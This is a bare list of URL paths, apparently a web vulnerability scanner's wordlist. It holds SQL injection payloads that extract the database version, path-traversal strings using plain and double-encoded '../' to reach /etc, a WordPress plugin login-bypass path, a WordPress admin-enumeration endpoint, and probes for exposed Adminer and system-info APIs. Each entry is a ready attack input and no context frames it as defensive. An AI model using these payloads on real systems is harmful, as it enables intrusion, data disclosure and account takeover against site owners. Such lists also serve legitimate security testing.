/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo
/api/modular-connector/login/{{string}}?origin=mo&type=foo
/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/adminer.php
/editor.php
/adminer/
/wp-json/mrm/v1/wp/admins?term=@
/api/status
/api/setup-complete
/api/4/system
/api/4/processlist
/api/4/config
/application/default
/application/..%2F..%2F..%2F..%2F..%2Fetc
/application/..%2F..%2F..%2F..%2F..%2Fetc/main
/application/..%252F..%252F..%252F..%252F..%252Fetc
/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc
